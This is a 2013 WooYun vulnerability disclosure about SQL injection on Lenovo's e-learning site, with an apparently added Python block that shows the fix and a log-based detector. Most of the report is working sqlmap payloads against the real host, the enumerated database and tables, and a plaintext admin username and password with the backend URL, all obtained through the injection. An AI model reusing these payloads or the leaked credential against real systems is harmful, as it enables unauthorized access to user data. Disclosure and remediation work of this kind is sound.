WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops article online viewer -------- http://drop.zone.ci/
2013-08-27: Details sent to the vendor, awaiting the vendor's handling
2013-08-27: Vendor has confirmed; details visible to the vendor only
2013-09-06: Details opened to core white hats and experts in the relevant field
2013-09-16: Details opened to regular white hats
2013-09-26: Details opened to intern white hats
2013-10-11: Details opened to the public
So many vulnerabilities. Lucky this time: it's not a blind injection.
Injection point:
http://e-learning.lenovo.com.cn/user/registration/ajax/group/3/shop/2777
The last path parameter is injectable.
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://e-learning.lenovo.com.cn:80/user/registration/ajax/group/3/shop/2777 AND 4534=4534/

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://e-learning.lenovo.com.cn:80/user/registration/ajax/group/3/shop/2777 AND (SELECT 2454 FROM(SELECT COUNT(*),CONCAT(0x71646d7071,(SELECT (CASE WHEN (2454=2454) THEN 1 ELSE 0 END)),0x7177767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)/

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: http://e-learning.lenovo.com.cn:80/user/registration/ajax/group/3/shop/-2768 UNION ALL SELECT CONCAT(0x71646d7071,0x456279506c5659574f6b,0x7177767a71)#/

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: http://e-learning.lenovo.com.cn:80/user/registration/ajax/group/3/shop/2777; SELECT SLEEP(5)-- /

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://e-learning.lenovo.com.cn:80/user/registration/ajax/group/3/shop/2777 AND SLEEP(5)/
---
web application technology: Apache 2.2.0, PHP 5.2.14
back-end DBMS: MySQL 5.0
Current user:
current user: 'lenovo@%'
Current database:
current database: 'lenovo'
696 tables:
Database: lenovo
[696 tables]
keys, active, active_type, active_up, active_up_user, active_user, ad_manage, admin_log, admin_users, am_news, area, area_cost, area_credits, area_main, area_photo, area_suggest, area_teacher, ask, ask_answer, ask_comment, ask_good, ask_score_detail, ask_search_keyword, ask_too, ask_user_reply_detail, assessquarter, autumnsurvey11, autumnsurvey12, bao_click_record, bao_click_record_20110829, bao_click_record_201112, bao_click_record_20120117, bao_history, bao_map, bao_q_record, bao_q_record_20110829, bao_q_record_20120109, bao_q_record_20120117, bao_record, bao_record_20110829, bao_record_20120109, bao_record_20120117, bao_session, bbs_elearning_groups, bind_record, cdb_access, cdb_activities, cdb_activityapplies, cdb_addons, cdb_adminactions, cdb_admincustom, cdb_admingroups, cdb_adminnotes, cdb_adminsessions, cdb_advertisements, cdb_announcements, cdb_assessment, cdb_assessment_2011q1, cdb_attachmentfields, cdb_attachments, cdb_attachpaymentlog, cdb_attachtypes, cdb_banned, cdb_bbcodes, cdb_caches, cdb_creditslog, cdb_crons, cdb_debateposts, cdb_debates, cdb_failedlogins, cdb_faqs, cdb_favoriteforums, cdb_favorites, cdb_favoritethreads, cdb_feeds, cdb_forumfields, cdb_forumlinks, cdb_forumrecommend, cdb_forums, cdb_imagetypes, cdb_invites, cdb_itempool, cdb_magiclog, cdb_magicmarket, cdb_magics, cdb_medallog, cdb_medals, cdb_memberfields, cdb_membermagics, cdb_memberrecommend, cdb_members, cdb_memberspaces, cdb_moderators, cdb_modworks, cdb_mytasks, cdb_navs, cdb_onlinelist, cdb_onlinetime, cdb_orders, cdb_paymentlog, cdb_pluginhooks, cdb_plugins, cdb_pluginvars, cdb_polloptions, cdb_polls, cdb_postposition, cdb_posts, cdb_profilefields, cdb_projects, cdb_promotions, cdb_prompt,
cdb_promptmsgs, cdb_prompttype, cdb_ranks, cdb_ratelog, cdb_regips, cdb_relatedthreads, cdb_reportlog, cdb_request, cdb_rewardlog, cdb_rsscaches, cdb_searchindex, cdb_sessions, cdb_settings, cdb_smilies, cdb_spacecaches, cdb_stats, cdb_statvars, cdb_styles, cdb_stylevars, cdb_tags, cdb_tasks, cdb_taskvars, cdb_templates, cdb_threads, cdb_threadsmod, cdb_threadtags, cdb_threadtypes, cdb_tradecomments, cdb_tradelog, cdb_tradeoptionvars, cdb_trades, cdb_typemodels, cdb_typeoptions, cdb_typeoptionvars, cdb_typevars, cdb_uc_admins, cdb_uc_applications, cdb_uc_badwords, cdb_uc_domains, cdb_uc_failedlogins, cdb_uc_feeds, cdb_uc_friends, cdb_uc_mailqueue, cdb_uc_memberfields, cdb_uc_members, cdb_uc_mergemembers, cdb_uc_newpm, cdb_uc_notelist, cdb_uc_pms, cdb_uc_protectedmembers, cdb_uc_settings, cdb_uc_sqlcache, cdb_uc_tags, cdb_uc_vars, cdb_usergroups, cdb_validating, cdb_warnings, cdb_words, cmamonthshop, contest, control, control_type, course, course_record, course_record_log, course_type, courseware, courseware_comment, courseware_detail, courseware_survey, datum, datum_sort, dealer, dict_card_lc, dict_card_lz, dict_card_user, dict_card_zd, dict_shop, dict_sys_user, downfile, ec3_shop, ec3_user, exam_paper, exam_paper_keys, exam_paper_questions, extra_power, fy12q4cloth, gift_record, greensurvey12, group_authoritys, groups, idea, idea_config, idea_config_bak, idea_forbid_log, idea_pic, idea_pw, idea_pw_vote, idea_vote, idea_vote_set, ideaother, ideaother_config, ideaother_forbid_log, ideaother_pic, ideaother_vote, ideaother_vote_set, ideaother_vote_set_copy, ideaother_voter, intel2_click_record, intel2_click_record_copy, intel2_click_record_new, intel2_history, intel2_map, intel2_map_copy, intel2_q_record, intel2_q_record_copy, intel2_record,
intel2_record_copy, intel2_session, intel_click_record, intel_click_record_copy, intel_history, intel_map, intel_map_copy, intel_q_record, intel_record, intel_session, irep_course, irep_quiz, kaoshi, keysnew, lbs_case, lbs_case_config, lbs_weekly, lbsuserlist, leadvise, learning_record, learning_record_log, lesurvey, lphone_shops, match_config, match_gift, match_gift_record, match_pic, match_record, match_result, match_result_bak, match_score, match_top, match_top_bak, message, msmadvise, news, newtraining, notice, notice_board, notice_record, notice_record_2012, notice_record_2013, nplay_session, operations, order_detail, order_record, pad_address, pad_click_record, pad_history, pad_map, pad_q_record, pad_record, pad_record_copy, pad_session, place, positions, power, pre_common_admincp_cmenu, pre_common_admincp_group, pre_common_admincp_member, pre_common_admincp_perm, pre_common_admincp_session, pre_common_admingroup, pre_common_adminnote, pre_common_advertisement, pre_common_advertisement_custom, pre_common_banned, pre_common_block, pre_common_block_favorite, pre_common_block_item, pre_common_block_item_data, pre_common_block_permission, pre_common_block_pic, pre_common_block_style, pre_common_block_xml, pre_common_cache, pre_common_card, pre_common_card_log, pre_common_card_type, pre_common_connect_guest, pre_common_credit_log, pre_common_credit_log_field, pre_common_credit_rule, pre_common_credit_rule_log, pre_common_credit_rule_log_field, pre_common_cron, pre_common_devicetoken, pre_common_district, pre_common_diy_data, pre_common_domain, pre_common_failedlogin, pre_common_friendlink, pre_common_grouppm, pre_common_invite, pre_common_magic, pre_common_magiclog, pre_common_mailcron, pre_common_mailqueue, pre_common_member, pre_common_member_action_log,
pre_common_member_connect, pre_common_member_count, pre_common_member_crime, pre_common_member_field_forum, pre_common_member_field_home, pre_common_member_forum_buylog, pre_common_member_grouppm, pre_common_member_log, pre_common_member_magic, pre_common_member_medal, pre_common_member_newprompt, pre_common_member_profile, pre_common_member_profile_setting, pre_common_member_security, pre_common_member_stat_field, pre_common_member_status, pre_common_member_validate, pre_common_member_verify, pre_common_member_verify_info, pre_common_myapp, pre_common_myinvite, pre_common_mytask, pre_common_nav, pre_common_onlinetime, pre_common_optimizer, pre_common_patch, pre_common_plugin, pre_common_pluginvar, pre_common_process, pre_common_regip, pre_common_relatedlink, pre_common_report, pre_common_searchindex, pre_common_secquestion, pre_common_session, pre_common_setting, pre_common_smiley, pre_common_sphinxcounter, pre_common_stat, pre_common_statuser, pre_common_style, pre_common_stylevar, pre_common_syscache, pre_common_tag, pre_common_tagitem, pre_common_task, pre_common_taskvar, pre_common_template, pre_common_template_block, pre_common_template_permission, pre_common_uin_black, pre_common_usergroup, pre_common_usergroup_field, pre_common_visit, pre_common_word, pre_common_word_type, pre_connect_disktask, pre_connect_feedlog, pre_connect_memberbindlog, pre_connect_postfeedlog, pre_connect_tthreadlog, pre_forum_access, pre_forum_activity, pre_forum_activityapply, pre_forum_announcement, pre_forum_attachment, pre_forum_attachment_0, pre_forum_attachment_1, pre_forum_attachment_2, pre_forum_attachment_3, pre_forum_attachment_4, pre_forum_attachment_5, pre_forum_attachment_6, pre_forum_attachment_7, pre_forum_attachment_8, pre_forum_attachment_9, pre_forum_attachment_exif, pre_forum_attachment_unused,
pre_forum_attachtype, pre_forum_bbcode, pre_forum_collection, pre_forum_collectioncomment, pre_forum_collectionfollow, pre_forum_collectioninvite, pre_forum_collectionrelated, pre_forum_collectionteamworker, pre_forum_collectionthread, pre_forum_creditslog, pre_forum_debate, pre_forum_debatepost, pre_forum_faq, pre_forum_filter_post, pre_forum_forum, pre_forum_forum_threadtable, pre_forum_forumfield, pre_forum_forumrecommend, pre_forum_groupcreditslog, pre_forum_groupfield, pre_forum_groupinvite, pre_forum_grouplevel, pre_forum_groupuser, pre_forum_hotreply_member, pre_forum_hotreply_number, pre_forum_imagetype, pre_forum_medal, pre_forum_medallog, pre_forum_memberrecommend, pre_forum_moderator, pre_forum_modwork, pre_forum_newthread, pre_forum_onlinelist, pre_forum_order, pre_forum_poll, pre_forum_polloption, pre_forum_polloption_image, pre_forum_pollvoter, pre_forum_post, pre_forum_post_location, pre_forum_post_moderate, pre_forum_post_tableid, pre_forum_postcache, pre_forum_postcomment, pre_forum_postlog, pre_forum_poststick, pre_forum_promotion, pre_forum_ratelog, pre_forum_relatedthread, pre_forum_replycredit, pre_forum_rsscache, pre_forum_sofa, pre_forum_spacecache, pre_forum_statlog, pre_forum_thread, pre_forum_thread_moderate, pre_forum_threadaddviews, pre_forum_threadcalendar, pre_forum_threadclass, pre_forum_threadclosed, pre_forum_threaddisablepos, pre_forum_threadhot, pre_forum_threadimage, pre_forum_threadlog, pre_forum_threadmod, pre_forum_threadpartake, pre_forum_threadpreview, pre_forum_threadprofile, pre_forum_threadprofile_group, pre_forum_threadrush, pre_forum_threadtype, pre_forum_trade, pre_forum_tradecomment, pre_forum_tradelog, pre_forum_typeoption, pre_forum_typeoptionvar, pre_forum_typevar, pre_forum_warning, pre_home_album, pre_home_album_category, pre_home_appcreditlog,
pre_home_blacklist, pre_home_blog, pre_home_blog_category, pre_home_blog_moderate, pre_home_blogfield, pre_home_class, pre_home_click, pre_home_clickuser, pre_home_comment, pre_home_comment_moderate, pre_home_docomment, pre_home_doing, pre_home_doing_moderate, pre_home_favorite, pre_home_feed, pre_home_feed_app, pre_home_follow, pre_home_follow_feed, pre_home_follow_feed_archiver, pre_home_friend, pre_home_friend_request, pre_home_friendlog, pre_home_notification, pre_home_pic, pre_home_pic_moderate, pre_home_picfield, pre_home_poke, pre_home_pokearchive, pre_home_share, pre_home_share_moderate, pre_home_show, pre_home_specialuser, pre_home_userapp, pre_home_userappfield, pre_home_visitor, pre_mobile_setting, pre_portal_article_content, pre_portal_article_count, pre_portal_article_moderate, pre_portal_article_related, pre_portal_article_title, pre_portal_article_trash, pre_portal_attachment, pre_portal_category, pre_portal_category_permission, pre_portal_comment, pre_portal_comment_moderate, pre_portal_rsscache, pre_portal_topic, pre_portal_topic_pic, pre_security_evilpost, pre_security_eviluser, pre_security_failedlog, pre_ucenter_admins, pre_ucenter_applications, pre_ucenter_badwords, pre_ucenter_domains, pre_ucenter_failedlogins, pre_ucenter_feeds, pre_ucenter_friends, pre_ucenter_mailqueue, pre_ucenter_memberfields, pre_ucenter_members, pre_ucenter_mergemembers, pre_ucenter_newpm, pre_ucenter_notelist, pre_ucenter_pm_indexes, pre_ucenter_pm_lists, pre_ucenter_pm_members, pre_ucenter_pm_messages_0, pre_ucenter_pm_messages_1, pre_ucenter_pm_messages_2, pre_ucenter_pm_messages_3, pre_ucenter_pm_messages_4, pre_ucenter_pm_messages_5, pre_ucenter_pm_messages_6, pre_ucenter_pm_messages_7, pre_ucenter_pm_messages_8, pre_ucenter_pm_messages_9, pre_ucenter_protectedmembers, pre_ucenter_settings,
pre_ucenter_sqlcache, pre_ucenter_tags, pre_ucenter_vars, province, quarter, questions, questions_box, questions_detail, quiz, rka_case, rka_course_list, rka_summary_periods, rka_talk, rka_talk_cate, rka_talk_copy, rka_talk_periods, rka_talk_vote, rka_talk_vote_log, rka_train, rka_train_periods, rka_train_summary, rka_train_summary_pic, rka_train_users, rka_train_vote, rkalevel, rkauserlist, salestalk, salestalk_num, scadvise, share, share_record, share_record_2012, share_record_2013, shop_cma201202, shop_cma201202_bak, shop_target, shopforum94, shopforum94_list, shopforum94_list_temp2, shopforum94top, shops, shops_copy201301112, shops_copy201301113, shops_flagship, shops_level, shops_seller, shops_seller20121111, shops_seller20121122, shouke, springsurvey12, springsurvey13, ss_log, star, summer_13_user, summer_13_user_copy, summercloth, summersurvey12, summersurvey13, super_sales, survey, survey25qa, survey_notice, survey_option, survey_option_title, survey_vote, t_train_file, task2_answer, task2_list, task2_manager, task2_mark, task2_que, task2_question1, task2_status, task2_user, task_answer, task_list, task_manager, task_mark, task_que, task_question31, task_status, task_user, teacher_info, teacher_train, test_1, test_1_1377186040, test_type, testing, think_advise, think_tmp, tmp_idea_user, tmp_user, train_file, trainsxdr, tree_area, tree_channel, tree_shoptype, tree_staff_type, txzquserlist, upgrade_user, user_advise, user_check, user_credits, user_credits_record, user_department, user_lenovo_kaoshi, userforum93, users, users_20120802, users_20121227copy, users_copy20130730, users_rka, usersbaoming, usersbaomingbiaotmp, usersbaominginfo, usersbaomingtmp, userskaoshi, userskaoshi_bak, userskaoshitmp, userskaoshitmp_bak,
verify_date, verify_history, wintercloth, wintersurvey11, wintersurvey12, yellowadvise, yellowsurvey11, ytadvise
Let's look at the data in the users table:
Database: lenovo
+-------+---------+
| Table | Entries |
+-------+---------+
| users | 101227  |
+-------+---------+
Then I dumped the admin table; the first MD5 was cracked, and I got into the backend. Username: admin, password: lenovoadmin2010
http://e-learning.lenovo.com.cn/admin/index
Filter the input, and change the weak password too.
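As an added illustration of the two fixes suggested here (it is not code from the report or from the affected site), the block below uses Python with an in-memory SQLite table as a stand-in for the PHP/MySQL stack the report fingerprints. The `shops` schema, the sample rows and the access-log lines are constructed for the example. It contrasts the defective pattern behind this finding (the `/shop/<id>` path segment pasted into the WHERE clause) with a hardened handler that allow-lists the segment as a bare integer and binds it as a query parameter, and it reuses that same allow-list as a detection rule over Apache-style log lines, flagging probing of the kind shown in the sqlmap output above.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for the application's `shops` table; the real
# schema and contents of the affected site are not on the page.
SAMPLE_SHOPS = [(2777, "sample shop 2777"), (2768, "sample shop 2768")]

# Only a plain decimal integer is an acceptable /shop/<id> path segment.
SHOP_ID = re.compile(r"[0-9]{1,10}")


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite table standing in for the MySQL `shops` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE shops (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO shops VALUES (?, ?)", SAMPLE_SHOPS)
    return conn


def vulnerable_shop_lookup(conn: sqlite3.Connection, raw_segment: str) -> list:
    """The 'before' pattern behind the finding: the path segment is pasted
    straight into the WHERE clause, so whoever controls the URL controls
    the query. Kept only to show the boolean oracle the report exploited."""
    sql = "SELECT id, name FROM shops WHERE id = " + raw_segment
    return conn.execute(sql).fetchall()


def is_valid_shop_id(raw_segment: str) -> bool:
    """Allow-list check: reject anything that is not a bare integer."""
    return SHOP_ID.fullmatch(raw_segment) is not None


def safe_shop_lookup(conn: sqlite3.Connection, raw_segment: str) -> list:
    """The 'after' pattern: validate the segment, then bind it as a
    parameter so the DBMS never parses user-controlled text as SQL."""
    if not is_valid_shop_id(raw_segment):
        raise ValueError("invalid shop id in path")
    shop_id = int(raw_segment)
    return conn.execute(
        "SELECT id, name FROM shops WHERE id = ?", (shop_id,)
    ).fetchall()


# Constructed Apache combined-log lines; IP and timestamps are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Aug/2013:10:00:01 +0800] "GET /user/registration/ajax/group/3/shop/2777 HTTP/1.1" 200 512',
    '203.0.113.5 - - [27/Aug/2013:10:00:02 +0800] "GET /user/registration/ajax/group/3/shop/2777%20AND%204534=4534/ HTTP/1.1" 200 512',
    '203.0.113.5 - - [27/Aug/2013:10:00:03 +0800] "GET /user/registration/ajax/group/3/shop/2777%20AND%20SLEEP(5)/ HTTP/1.1" 200 512',
]

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines) -> list:
    """Flag every request whose /shop/ segment is not a bare integer.
    The allow-list the fixed handler enforces doubles as a detection rule
    for the kind of probing the report's sqlmap output shows."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        # Decode %20 etc. and drop any query string before inspecting the path.
        path = unquote(m.group("path")).split("?", 1)[0]
        parts = path.split("/shop/", 1)
        if len(parts) != 2:
            continue
        segment = parts[1].rstrip("/")
        if not is_valid_shop_id(segment):
            findings.append((m.group("ip"), m.group("ts"), segment))
    return findings


if __name__ == "__main__":
    db = make_db()
    print(safe_shop_lookup(db, "2777"))
    for ip, ts, seg in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} suspicious shop segment: {seg!r}")
```

The allow-list is deliberately stricter than "escape quotes": the injection here needed no quote at all, because the id is numeric context, so only a bind parameter plus a type check closes it. The same rule applied at the web-server or WAF layer gives an early signal of enumeration against this endpoint.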
Severity: High
Vulnerability Rank: 20
Confirmed at: 2013-08-27 13:59
Thank you for your contribution to Lenovo's security! We will evaluate and fix the relevant vulnerability immediately.
None yet